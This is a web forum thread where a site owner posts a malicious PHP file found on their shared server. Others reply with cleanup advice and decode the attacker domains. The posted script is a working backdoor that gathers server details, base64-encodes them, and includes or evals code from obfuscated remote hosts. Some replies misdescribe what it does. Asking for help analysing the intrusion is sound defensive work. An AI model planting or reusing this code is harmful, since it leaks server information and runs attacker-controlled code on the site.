mysterious file

[bcoffin]

I just noticed that somebody uploaded this file to my server.

Any idea what it does?

<? 
error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);

$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); 

if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); 
else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); 
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); 
?>

[cooldude832]

delete it fast.

 

Its a phsing bot to try and get info on your server I will type more later

 

Its looking for a file (i'm not sure exactly what) and its basically trying to execute it not sure what said file does, but odds are its something you are trying to protect with chmonds and they are trying to execute it, if they succeed (it could be a mysql connection) they could delete your database or hijack it.

[PC Nerd]

** ouch??

 

 

btw - if someone uploaded it to our server - then look at your security etc.. ,maybe change passwords etc... ebcause if its easy to uplaod to your serve rthen it coudldefinately happen again.

[bcoffin]

Strange, I'm doing a phpupload there, but ignoring all files with extension ".php" .. I'm not sure how it got in there. There were .htaccess files pointing to that php as an error 404 handler, but not sure how they were able to write .htaccess files either.

[resago]

here is what they are trying to include or execute. the 3rd one sends all that info about your server.

http://a.rsdcraft.ws

http://ad.runweb.info

http://7.xmldata.info/?

 

 

[themightydude]

Strange, I'm doing a phpupload there, but ignoring all files with extension ".php" .. I'm not sure how it got in there. There were .htaccess files pointing to that php as an error 404 handler, but not sure how they were able to write .htaccess files either.

 

Is this file on your own dedicated server or is this a shared hosting account?

 

Its possible that access could have been gained through some other script on the server that wasn't locked down.

 

Might check the apache domlogs for that file name.

[bcoffin]

it's on a shared server.

I've never met a dedicated server worth a hill of beans .. recommendations much welcome.

 

How  do you recommend that I "lock down" my shared "portion" ??

Thanks you guys..